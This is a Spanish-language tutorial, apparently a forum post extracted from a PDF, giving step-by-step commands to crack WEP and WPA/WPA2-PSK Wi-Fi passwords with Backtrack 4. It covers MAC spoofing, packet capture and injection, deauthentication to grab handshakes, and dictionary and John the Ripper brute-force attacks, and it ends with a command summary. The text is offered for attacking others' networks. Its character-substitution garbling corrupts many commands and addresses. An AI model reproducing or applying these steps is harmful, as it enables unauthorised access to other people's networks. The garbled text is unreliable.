Crakear Wep y WPA/WPA2/PSK 100% seguro con Backtrack 4

1.1.introducion
hoy les enseare como crackear wep,wpa,wpa2,psk desde 0 con un CD live de backtrack 4
1.2-descargen backtrack 4
Aqui esta el link:http:www!backtrack"linu#!or$downloads
2"una ve% descar$ado colocamos el dvd con backtrack y boteamos dese la
lectora veremos al$o asi
una ves selecionada, car$ara los archivos necesarios y colocaremos en la consola el comando:
start!
una ve% tipeado,presionamos enter y nos llevara al escritorio en donde encotraremos las herramientas para traba&ar!
en la parte in'erior derecha veremos una bandera si damos click con el boton secundario del mouse, podemos
cambiar el teclado por el espaol para que sea mas 'acil insertar comandos en la consola!
click derecho en la bandera,con'i$ure,lue$o buscamos spain en el menu i%quierdo,doble click en ella y ya la
podremos seleccionar para utili%arla!
"-ca#$iando nuestra #ac
lo primero que haremos sera cambiar nuestra mac para que sea mas 'acil de recordar accedemos a la consola y
tipeamos:
air#on-ng
como vemos en la ima$en,mi inter'a% se llama:
wlan0
lo que haremos ahora para detenerla para ello tipeamos:
air#on-ng stop %&an0
una ve% hecho esto tipeamos lo si$uiente:
i'con'ig %&an0 do%n
ahora pasaremos a cambiar nuestra mac para ello tipeamos:
#acc(anger --#ac
001122""44)) %&an0
si nos quedo al$o como la ima$en quiere decir que hemos hecho todos los pasos bien!
'inalmente pondremos nuevamente nuestra tar&ete en modo monitor tipeando la si$uiente linea :
air#on- start %&an0
4-$uscando redes
para comen%ar tipeamos la si$uiente linea:
airodu#p-ng %&an0
para este tutuorial con'i$ure mi router con una pass wep!
como se puede ver aprecio mi red y tiene encriptacion wep lo que
haremos ahora sera parar el scaneo precionando ctrl(c
)-capturando *datas
tipeamos la si$tes lineas:
airodu#p-ng -c1-%underc0de --$ssid +,)+4CC- +C.. %&an0
me detendre un poco a e#plicar! como podran ver, coloque en a%ul al$unos parametros!
en donde esta el ) debemos modi'icarlo por el CA*A+ que es en donde
esta la C, en la ima$en )0!en mi caso es el canal )
donde dice underc0de, debemos modi'icarlo por un nombre que nosotros queramos por ultimo en donde esta la
-AC deben colocar
+a -AC que estan atacando una ve% e&ecuta esta linea comen%ara a capturar los .DA/A que son datos nesesarios
para lue$o desci'rar la pass
/-asociandonos a &a red
lo que haremos ahora sera asociarnos! para ello abrimos otra consola,
sin cerrar la anterior ya que se$uira capturando los .datas que necesitaremos mas adelante!
en la nueva consola tipearemos:
airep&ay-ng -1 0 -a
+,)+4CC- +C.. -(
001122""44)) -e %&an0
en esta linea modi'icaremos lo a%ul nuevamente!en este caso la mac por la que estamos atacando y en donde dice
mi nombre por el 0112D
que estamos atacando,que en mi caso se llama A*/3A4!
si lle$amos hasta aca y nos aparece eso de la ima$en quire decir
que hasta el momento hemos hecho las cosas bien
de lo contrario aparece al$un error, las causas pueden ser las si$tes:
"la red a la que quieres atacar esta muy le&os!
"tu tar&eta de red no puede hacer inyeccion de paquetes !
"el router tiene se$uridad para evitar esta tipo de ataques!
--inyectando tra'ico
tipeamos ahora en la misma consola el si$te comando:
airep&ay-ng -" -$
+,)+4CC- +C.. -(
001122""44)) %&an0
al i$ual que antes modi'icaremos la mac en a%ul
por la que estamos atacando!
una ve% hecho esto comen%ara a inyectar tra'ico y los .DA/A1 comen%aran a subir velo%mente!
si lle$amos hasta aca y tenemos todo bien estamos a solo un paso!recuerden que es nesesario capturar muchos
.datas mientras mas ten$amos me&or la cantidad de .datas que debamos capturar dependera de que tan
complicada sea la 5ass
,-desencriptando &a pass%ord
hemos lle$ado al 'inal!!!en una tercer consola,tipeamos los si$te:
aircrack-ng underc0de -01.cap
como siempre modi'icamos lo a%ul por el nombre que pusimos previamente en el paso 4! al e&ecutar el comando la
pass se comen%ara a desencriptar!
esperamos un momento a qu se desencripte, y si todo esta bien, nos tiriri la pass, de lo contrrio debemos se$uir
capturando mas .datas hasta obtener la 5ass!
como pueden ver en mi caso la pass es:under
0-%pa/%pa2 cracking
0.1 introduccion
en esta seccion les enseare a crackear 65A65A2517 desde 0!
en la primera parte que 'ue de como iniciar desde dvd de backtrack,por lo tanto arrancaremos con la linea de
comandos
en primer lu$ar,colocamos nuestra inter'a% en modo monitor de la misma 'orma que el caso anterior 8wep crackin$9
:!2 capturando el handshake
la si$te linea de comando scanneara las redes cercanas:
airodu#p-ng #on0
como se puede ver aparece una red llamada A*/3A4
que sera la que atacare!
de este paso debemos tener en cuenta el canal en este caso es )!0+ ;112D y la 1/A/2<*
una ve% que sale la -AC de la red que deseamos atacar con una estacion 'renamos el scanneo precionando
C/3+(C
ahora tipeamos la si$uiente linea:
airidu#p-ng #on0 --c(anne& 1 --$ssid +,)+4CC- +C.. -%/t#p/%pa2
se$uido a esto nos aparecera una ima$en de la red sin clientes conectados y en otra consola tipeamos:
airep&ay-ng -0 1 -a
+,)+4CC- +C.. -C
-0 11A104.,"4 #on0
una ve% tipeado esto,podremos ver que aparaceran redes en otra consola y podremos capturar el handshake!
como se puede ver en la ultima ima$en, hemos capturado el handshake,ahora lo que nos queda es desencriptar la
password esto se puede hacer de dos 'ormas
)"bruteandola con el &onh the ripper
2"por medio de diccionario
10.o$teniendo &a c&a2e
para hacerla por medio de aircrack tipeamos la si$tes lineas:
aircrack-ng -%
/pentest/pass%ords/%ord&ists/%pa.
t!t -$ +,)+4CC- +C..
/t#p/%pa23.cap
en este caso estoy utili%ando el diccionario que viene con bactrack!
ustedes pueden utili%ar sus propios diccionarios y corri$en la ruta del mismo como podran ver,ahi obtuvo la clave y
en este caso es: thisisatest
ahora veamos la 'orma de hacerlo por medio de &onh the ripper!
tipeamos el si$te comando:
/pentest/pass%ord/4tr/4on( --
stdount --incre#enta&a&& 5
aircrack-ng -$ +,)+4CC- +C..
-% - /t#p/%pa23.cap
recuerden cambiar la mac por la que estan atacando y el directorio si es que lo modi'icaron! ambos metodos,tantos
por diccionario como
por &onh the ripper suelen demorar dependiendo la di'icultad de la contrasea!
11-%ep y %pa cracking con %i'ite
11.1-introducion
ahora veremos como crackear wep o wpa sencilla con wi'ite
11.2-$uscando red
comen%aremos scanneando y bucaremos una red para sacarle la clave para ello abrimos una consola y tipeamos:
airodu#p-ng %&an0
recuerden que en mi caso mi inter'a% se llama wlan0,ustede% deben colocar la suya
del scanneo debemos tener en cuenta el tipo de encriptacion en este caso es una wpa y el canal que aqui es )
despues paramos el scanneo con C/3+(C
12.interpretando e& script %i'ite
en mi caso lo $uarde en el escritorio del backtrack por lo tanto debo tipear:
pyt(on %i'ite.py
una ve% tipeado presionamos enter y se nos abrira el $ui o el $ra'ico de la tool!
1".con'igurando e& %i'ite
bueno como ven coloque mi inter'a% el tipo de encriptacion 8wpa9y el canal )
lo otro que pueden modi'icar es la direccion del diccionario por uno propio que ten$an en este tutorial usare el que
viene por de'ecto una ve% hecho eso presionaremos el boton ro&o h4#0r )t n40
14.$uscando e& (ands(ake y desencryptando &a pass
al ser todo automatico como ya lo notaron solo debemos esperar a que busque solo el handshake y saque la pass:
bueno com0 podemos ver pudo sacar la contrasea que en mi caso es malwares 'inalmente crea un lo$ con un
te#to como el si$te:
62011-04-02 22)0"17 cracked
%pa key 'or A89:A;
<+,)+4CC- +C..=>t(e key is
#a&%ares
resu#en de codigos
1.%ep
*</A:en todos los casos reempla%ar:
4444:inter'ace
====:canal
>>>>:-AC ;112D
333:0112D
1.1Ca#$iar &a #ac
a!airmon"n$ 8ver la inter'ace que usamos9
b!airmon!n$ stop #### 8detenemos el modo monitor9
c!i'con'i$ 4444?color@ down 8tiramos nuestra inter'ace9
d!macchan$er ""mac 00:)):22:AA:44:BB 4444 8cambiamos nuestra mac,
en este caso sera 00:)):22:AA:44:BB9
e!airmon$"n$ start 4444 8volvemos a iniciar el modo monitor9
1.2.$uscar redes
'! airodump"n$ 4444 8scannea redes9
$!C/3+(C 8detiene el scanneo9
h!airomdump"n$ "c %%%% "w datas ""bssid >>>> 4444 8capturamos .datas9 ?no cerrar consola@
1.".asociandonos a &a red<en otra conso&a=
2!airodump"n$ ") 0 "a yyyy "h 00:)):22:AA:44:BB "e 333 4444
8A1<C2AC2<* C<* +A 30D9
1.4 inyectando tra'ico
&!aireplay"n$ "A "b yyyy "h 00:)):22:AA:44:BB 4444 8captura datas a mas velocidad9
1.).desencriptando &a c&a2e <en otra conso&a=
k!aircrack"n$ datas"0)!cap 8desencripta la clave con aircrack9
2.%pa/%pa2/psk
*</A:en todos los casos reempla%ar:
4444:inter'ace
====:Canal
>>>>:-AC ;112D
333:2nter'ace modo monitor
////:1tation
2.1.co&ocar &a inter'ace en #odo #onitor
a!aimon"n$ 8saber nuestra inter'ace9
b!airmon"n$ start 4444?color@ 8colocamos en modo monitor nuestra inter'ace9
2.2.capturando e& (ands(ake
c!airodump"n$ 333 8scannea redes9
d!C/3+(C 8'rena el scanneo9
e!airodump"n$ 333 ""channel ) "" bssid yyyy "w tmpwpa2 8$uardara los C!cap en el directorio que le indiquemos9
'!aireplay"n$ "0 ) "a yyyy "c tttt 3338comen%ara la captura del handshake9
2.".o$teniendo &a c&a2e
$!)! aircrack"n$ "w pentestpasswordswordlistswpa!t#t "b yyyy
tmpwpa2C!cap 8saca la pass por diccionario9
$!2! pentestpassword&tr&onh ""stdout ""incremental:all D
aircrack"n$ "b yyyy "w " tmpwpa2C!cap 8saca la pass por 'uer%a bruta con &onh the ripper9
Buena suerte....